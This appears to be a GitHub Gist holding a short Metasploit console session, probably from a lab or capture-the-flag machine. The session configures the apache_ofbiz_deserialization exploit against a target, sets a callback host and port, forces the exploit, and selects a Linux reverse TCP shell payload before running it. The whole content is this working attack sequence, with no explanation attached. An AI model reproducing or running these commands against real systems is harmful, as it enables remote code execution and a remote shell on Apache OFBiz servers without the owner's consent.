Created
September 11, 2021 07:40
-
-
Save oxtd/f11d470562b4ee175cdcc4af445ca9e9 to your computer and use it in GitHub Desktop.
msf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| msf6 exploit(linux/http/apache_ofbiz_deserialization) > set rhosts 127.0.0.1 | |
| rhosts => 127.0.0.1 | |
| msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lhost 10.10.14.225 | |
| lhost => 10.10.14.225 | |
| msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lport 9001 | |
| lport => 9001 | |
| msf6 exploit(linux/http/apache_ofbiz_deserialization) > set forceexploit true | |
| forceexploit => true | |
| msf6 exploit(linux/http/apache_ofbiz_deserialization) > set payload linux/x64/shell/reverse_tcp | |
| payload => linux/x64/shell/reverse_tcp | |
| msf6 exploit(linux/http/apache_ofbiz_deserialization) > run |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment